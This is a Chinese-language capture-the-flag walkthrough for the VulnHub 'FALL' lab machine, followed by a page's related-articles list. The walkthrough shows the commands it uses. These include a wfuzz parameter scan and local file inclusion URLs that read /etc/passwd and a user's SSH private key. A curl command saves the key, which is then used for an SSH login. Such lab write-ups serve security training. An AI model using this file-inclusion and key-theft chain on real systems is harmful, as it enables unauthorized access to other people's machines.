VulnHub-FALL通关攻略

第一步:确定靶机IP为192.168.40.129
第二步:扫描后台及开放端口
复制代码
#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
139 --- NetBIOS服务
443 --- 	https服务
445 --- SMB协议
3306 --- Mysql
8080 --- Internet 信息服务
第三步:尝试访问扫到的端口和文件
第四步:尝试使用kali自带的FUZZ
复制代码
#使用kali自带的FUZZ
wfuzz -u "http://192.168.40.129/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
第五步:尝试访问/etc/passwd敏感文件,发现qiu用户,且权限为1000
复制代码
#/etc/passwd
http://192.168.40.129/test.php?file=/etc/passwd
第六步:尝试查看用户qiu的 ssh 密钥
复制代码
#查看用户qiu的 ssh 密钥  
http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa
第七步:尝试利用文件包含来得到qiu的ssh私钥文件,并使用cat查看
复制代码
#得到ssh私钥文件
curl http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
第八步:给予密钥文件权限为600,以正常使用
复制代码
chmod 600 id_rsa
第九步:使用这个私钥登录qiu用户,发现连接成功
复制代码
 ssh -i id_rsa [email protected]

FROM IYU_

相关推荐
DevSecOps选型指南2 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化2 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
恰薯条的屑海鸥3 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
阿部多瑞 ABU4 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
网安INF5 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_5 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
moongoblin6 小时前
行业赋能篇-2-能源行业安全运维升级
运维·安全·协作
Fortinet_CHINA6 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
网络·安全
这儿有一堆花7 小时前
安全访问家中 Linux 服务器的远程方案 —— 专为单用户场景设计
linux·服务器·安全
李枫月8 小时前
Server2003 B-1 Windows操作系统渗透
网络安全·环境解析·server2003